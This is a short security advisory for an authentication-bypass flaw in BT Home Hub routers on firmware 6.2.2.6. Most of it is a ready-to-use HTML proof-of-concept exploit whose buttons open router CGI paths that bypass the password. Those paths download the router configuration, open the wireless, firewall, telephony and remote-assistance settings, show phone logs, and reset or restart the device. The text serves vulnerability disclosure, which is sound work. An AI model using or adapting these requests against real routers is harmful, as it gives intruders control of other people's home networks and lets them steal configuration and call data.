source: https://www.securityfocus.com/bid/26333/info

BT Home Hub is prone to an authentication-bypass vulnerability.

An attacker could exploit this issue to gain unauthorized access to the affected device.

BT Home Hub firmware 6.2.2.6 is vulnerable; other versions may also be affected. 

This exploit allows you to access most pages on a BTHomeHub Router, without needing to know the password. It has been tested to work with firmware version 6.2.2.6.

<form>
<input type="button" value="Download Current Router Configuration"
onclick="window.open('http://bthomehub.home/cgi/b/backup/user.ini/bthomehub-config')">
</form>

<form>
<input type="button" value="Wireless Configuration Page"
onclick="window.open('http://bthomehub.home/cgi/b/_wli_/cfg/djfkhfd')">
</form>

<form>
<input type="button" value="Wireless Security Configuration Page"
onclick="window.open('http://bthomehub.home/cgi/b/_wli_/seccfg/dbddfbdb')">
</form>

<form>
<input type="button" value="Wireless Repeater Configuation Page"
onclick="window.open('http://bthomehub.home/cgi/b/_wds_/cfg/fjfgfgh')">
</form>

<form>
<input type="button" value="Telephony Configuration Page"
onclick="window.open('http://bthomehub.home/cgi/b/_voip_/cfg/fhfjhgg')">
</form>
<form>
<input type="button" value="IP Addresses Configuration Page"
onclick="window.open('http://bthomehub.home/cgi/b/intfs/_intf_/cfg/dgdgdg')">
</form>

<form>
<input type="button" value="Devices Configuration Page"
onclick="window.open('http://bthomehub.home/cgi/b/devs/cfg/fefefef')">
</form>

<form>
<input type="button" value="Firewall Configuration Page"
onclick="window.open('http://bthomehub.home/cgi/b/secpol/cfg/fjfjhfj')">
</form>

<form>
<input type="button" value="Reset Router"
onclick="window.open('http://bthomehub.home/cgi/b/info/reset/gegegee')">
</form>

<form>
<input type="button" value="Restart Router"
onclick="window.open('http://bthomehub.home/cgi/b/info/restart/fhfjhgg')">
</form>

<form>
<input type="button" value="Remote Assistance Configuration Page"
onclick="window.open('http://bthomehub.home/cgi/b/ras/fjgfgfgh')">
</form>

<form>
<input type="button" value="Backup and Restore Configuration Page"
onclick="window.open('http://bthomehub.home/cgi/b/bandr/fjgfgfgh')">
</form>

<form>
<input type="button" value="Home Network Page"
onclick="window.open('http://bthomehub.home/cgi/b/lan/fjgfgfgh')">
</form>

<form>
<input type="button" value="Phone Logs Page"
onclick="window.open('http://bthomehub.home/cgi/b/_voip_/stats/dhjfhdfjh')">
</form>